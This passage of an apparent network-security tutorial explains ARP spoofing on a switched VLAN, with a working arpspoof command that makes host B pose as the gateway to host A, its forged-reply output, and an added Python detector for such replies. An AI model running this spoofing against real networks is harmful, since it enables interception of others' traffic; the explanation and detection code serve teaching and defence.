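machine, so that even if the system is connected to a switch, packet capture is not affected, and network sniffing through the switch is thereby easily achieved. An example follows:
Hosts A and B are connected to the same VLAN on the switch.
Host A IP address: 192.168.1.37
Host B IP address: 192.168.1.35, MAC address: 08-00-20-c8-fe-15
Gateway IP address: 192.168.1.33, MAC address: 00-90-6d-f2-24-00
First, look at host A's ARP table on host A: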
C:\>arp -a
Interface: 192.168.1.37
  Internet Address      Physical Address      Type
  192.168.1.33          00-90-6d-f2-24-00     dynamic
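We can see that host A holds the gateway's IP address 192.168.1.33 and its corresponding MAC address 00-90-6d-f2-24-00.
On host B we run arpspoof, targeting host A and claiming to be the gateway, as follows: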
HOSTB# arpspoof -t 192.168.1.37 192.168.1.33
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
We can see that host B keeps sending ARP replies to A.
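From the defender's side, the replies above are detectable because they bind the gateway IP to host B's MAC. The following is an added example, not part of the original page: it checks ARP reply lines against a table of known-good bindings. The TRUSTED table, the function names and the third sample line (a legitimate gateway reply) are assumptions constructed for illustration.

```python
import re

# Known-good IP-to-MAC bindings, taken from the example above (assumed to be
# maintained by the administrator).
TRUSTED = {
    "192.168.1.33": "00-90-6d-f2-24-00",  # gateway
    "192.168.1.35": "08-00-20-c8-fe-15",  # host B
}

# Constructed sample in the line format shown above; the last line is a
# constructed legitimate reply from the real gateway.
SAMPLE = """\
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
0:90:6d:f2:24:0 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 0:90:6d:f2:24:0
"""

LINE = re.compile(r"^\S+ \S+ 0806 \d+: arp reply (\S+) is-at (\S+)$")

def norm_mac(mac):
    """Canonical form: six zero-padded lowercase octets joined by ':'."""
    parts = re.split(r"[:-]", mac.strip().lower())
    if len(parts) != 6:
        raise ValueError(f"not a MAC address: {mac!r}")
    return ":".join(f"{int(p, 16):02x}" for p in parts)

def find_spoofed_replies(text, trusted):
    """Return one alert per (ip, claimed MAC) that contradicts the trusted table."""
    known = {ip: norm_mac(mac) for ip, mac in trusted.items()}
    owner = {mac: ip for ip, mac in known.items()}  # MAC -> IP that really owns it
    alerts = {}
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue  # not an ARP reply line
        ip, claimed = m.group(1), norm_mac(m.group(2))
        if ip in known and claimed != known[ip]:
            alert = alerts.setdefault((ip, claimed), {
                "ip": ip, "expected": known[ip], "claimed": claimed,
                "likely_sender": owner.get(claimed), "count": 0})
            alert["count"] += 1
    return list(alerts.values())

if __name__ == "__main__":
    for alert in find_spoofed_replies(SAMPLE, TRUSTED):
        print(alert)
```

Normalising the MAC first matters here: the ARP table prints 08-00-20-c8-fe-15 while the capture prints 8:0:20:c8:fe:15, and a plain string comparison would treat them as different addresses.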